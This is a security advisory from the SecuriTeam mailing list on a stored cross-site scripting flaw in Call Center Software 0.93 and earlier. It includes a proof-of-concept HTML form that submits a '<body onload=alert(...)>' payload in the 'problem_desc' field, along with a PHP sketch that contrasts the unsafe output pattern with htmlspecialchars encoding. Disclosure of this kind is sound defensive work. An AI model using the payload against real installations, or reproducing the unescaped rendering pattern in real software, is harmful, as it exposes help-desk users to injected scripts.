[UNIX] Call Center Software XSS via POST (Exploit)



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



Call Center Software XSS via POST (Exploit)
------------------------------------------------------------------------


SUMMARY

<http://www.call-center-software.org/> Call Center Software is "one of
the most important aspects of any call help center, being able to track
and manage calls can be the key to high customer satisfaction. Our 100%
free call center software solution is based on PHP and the MySQL
database". A vulnerability in the way Call Center Software handles
user-provided input allows attackers to insert arbitrary HTML and/or
JavaScript into the database.

DETAILS

Vulnerable Systems:
* Call Center Software version: 0.93 and prior

Call Center Software allows users to insert a problem description (stored
under the 'problem_desc' field) into the database. This field is a text
field, so any character can be placed there. If a user inserts HTML and/or
JavaScript into the description field, Call Center Software returns it
as-is to any user viewing the problem description, which in turn can be
used to cause an XSS attack.

Exploit:
<html>
<head>
<title>Call Center</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" href="helpdesk.css" type="text/css">
</head>

<body>
<table bgcolor="#FFFFFF" width="100%">
<tr>
<td align="center">
<form method="post"
action="http://remote_server/path/call_entry.php">
<table border="0">
<tr>
<th class="ttitle">Adding Call</th>
</tr>
<tr>
<td>
<table width="100%" border="0" cellspacing="0"
cellpadding="3">
<tr>
<td align="right">Name: </td><td
align="left"><input type="text" name="name" value="H4ck3r" size="30"></td>
</tr>
<tr>
<td align="right">Phone: </td><td
align="left"><input type="text" name="phone" value="111-555-555"
size="20"></td>
</tr>
<tr>
<td align="right">Department: </td>
<td>
<select name="department_id">


<option value="1">Problem</option>
</select>
</td>
</tr>
<tr>
<td align="right">Issue Type: </td>
<td>
<select name="issue_id">

<option value="6">email</option>

<option value="2">keyboard</option>

<option value="3">monitor</option>

<option value="5">mouse</option>

<option value="4">network</option>

<option value="8">password</option>

<option value="7">word processing</option>
</select>
</td>
</tr>
<tr>
<td align="right" valign="top">Xss Script
Here : </td>
<td align="left"><input type="text"
name="problem_desc" value="<body onload=alert(1395499912)>"
size="50"></td>
</tr>
<tr>
<td> </td><td><input type="submit"
name="submit" value="Add" class="button"></td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</td>
</tr>
</table>
</body>
</html>
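
Mitigation sketch (an added example, not part of the original advisory and not Call Center Software's own code): the stored 'problem_desc' value is HTML-encoded when it is written into a page, shown beside the unencoded pattern the advisory describes. The function names and the sample row are assumptions; the payload is the one from the form above.

```php
<?php
// Added example. Function names and the sample row are hypothetical;
// this is not Call Center Software's own code.

// Constructed row as it would come back from the database, holding the
// payload used in the advisory's form.
$row = [
    'name'         => 'H4ck3r',
    'phone'        => '111-555-555',
    'problem_desc' => '<body onload=alert(1395499912)>',
];

// Vulnerable pattern: the stored value is concatenated into the page,
// so the browser parses it as markup and runs the onload handler.
function render_cell_unsafe(array $row): string
{
    return '<td>' . $row['problem_desc'] . '</td>';
}

// HTML-encode at output time. ENT_QUOTES also encodes ' and ", which
// matters when the value is written back into a quoted attribute.
// The charset matches the iso-8859-1 the page declares.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES, 'ISO-8859-1');
}

function render_cell_safe(array $row): string
{
    return '<td>' . h($row['problem_desc']) . '</td>';
}

// Same value placed in an attribute, e.g. an edit form for the call.
function render_input_safe(array $row): string
{
    return '<input type="text" name="problem_desc" value="'
        . h($row['problem_desc']) . '" size="50">';
}

echo render_cell_unsafe($row), "\n";
echo render_cell_safe($row), "\n";
echo render_input_safe($row), "\n";
```

Encoding at output leaves the stored data unchanged and neutralises values that are already in the database, which input filtering alone would not.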


ADDITIONAL INFORMATION

The information has been provided by <mailto:corrado.liotta@xxxxxxxx>
Corrado Liotta.
The original article can be found at: http://www.kasamba.com/CorryL




DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


